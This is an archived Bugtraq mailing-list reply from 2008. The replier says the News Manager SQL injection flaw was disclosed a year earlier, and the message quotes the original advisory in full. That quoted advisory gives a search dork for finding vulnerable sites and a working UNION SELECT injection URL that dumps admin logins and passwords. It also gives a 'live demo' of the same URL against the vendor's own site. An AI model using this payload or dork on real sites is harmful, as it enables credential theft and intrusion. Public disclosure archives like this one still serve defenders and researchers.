Re: News Manager Remote SQL Injection Vulnerability

To: Ghost hacker <ghost-r00t@xxxxxxxxxxx>
Subject: Re: News Manager Remote SQL Injection Vulnerability
From: packet@xxxxxxxxxxxxxxxxxxxxxxx
Date: Thu, 9 Oct 2008 18:20:30 -0400
Cc: ستروك <submit@xxxxxxxxxxx>, السيكروتي فوكس <bugtraq@xxxxxxxxxxxxxxxxx>
In-reply-to: <BLU137-W444250DB553D7EBFB5EA0C833A0@xxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
References: <BLU137-W444250DB553D7EBFB5EA0C833A0@xxxxxxx>
User-agent: Mutt/1.5.17+20080114 (2008-01-14)

Discovered over a year ago.

http://packetstormsecurity.org/0705-exploits/prenews-sql.txt 
0bae5b1d6f9d99c6749403341807f0d8 Pre News Manager version 1.0 suffers from a 
remote SQL injection vulnerability. &nbsp;Homepage: <a 
href="http://www.cyber-security.org/"; 
target="ext">http://www.cyber-security.org/.</a> 

On Thu, Oct 09, 2008 at 12:21:25PM +0300, Ghost hacker wrote:
> 
> ####################################################################################################
> # News Manager Remote SQL Injection Vulnerability                             
>                      #
> # © Ghost Hacker , Real Hack Back :)                                          
>                      #
> ####################################################################################################
> #[~] Author : Ghost Hacker                                                    
>                      #
> #[~] Home page : www.Real-h.com  [Real Hack Back]                             
>                      #
> #[~] Contact Me : Ghost-r00t@xxxxxxxxxxx                                      
>                      #
> #[~] Bug : SQL Injection                                                      
>                      #
> #[~] From : Kingdom Saudi Arabia                                              
>                      #
> #[~] Name Script : News Manager                                               
>                      #
> #[~] Download : http://www.preprojects.com/news.asp                           
>                      #
> ####################################################################################################
> #[~] Dork :                                                                   
>                      #
> # ©2006 PRE NEWS MANAGER | All Rights Reserved Or inurl:news_detail.php?nid=  
>                      #
> #[~] Exploit :                                                                
>                      #
> # 
> http://xxxx/news_detail.php?nid=-139+UNION+SELECT+1,2,concat(login,0x3a,password),3,5,6,7+from+admin--
> #[~] live demo :                                                              
>                      #
> # http://www.preproject.com/news 
> manager/news_detail.php?nid=-139+UNION+SELECT+1,2,concat(login,0x3a,password),3,5,6,7+from+admin--
> ####################################################################################################
> #[~]Greets :                                                                  
>                      #
> # Mr.SQL , Mr.SaFa7 , Mr-3sheq , aBo3tB , Night Mare , Root Hacker , Dmar 
> al3noOoz , L&J TeaM      #
> # Mr.MN7oS , Mr.Hope , EgYpTiaN x HaCkEr , PrO SpY , v4-team.com              
>                      #
> # All Members Real Hack , All My Friends :)                                   
>                      #
> ####################################################################################################
> # Viva Real Hack - Real-h.com ..                                              
>                      #
> ####################################################################################################
> _________________________________________________________________
> Express yourself instantly with MSN Messenger! Download today it's FREE!
> http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

References:
- News Manager Remote SQL Injection Vulnerability
  - From: Ghost hacker

Prev by Date: CA ARCserve Backup Multiple Vulnerabilities
Next by Date: [SECURITY] CVE-2008-3271 - Apache Tomcat information disclosure
Previous by thread: News Manager Remote SQL Injection Vulnerability
Next by thread: PR07-31: Unauthenticated SQL Injection, XSS on Login Page and Username Enumeration on DPSnet Case Progress
Index(es):
- Date
- Thread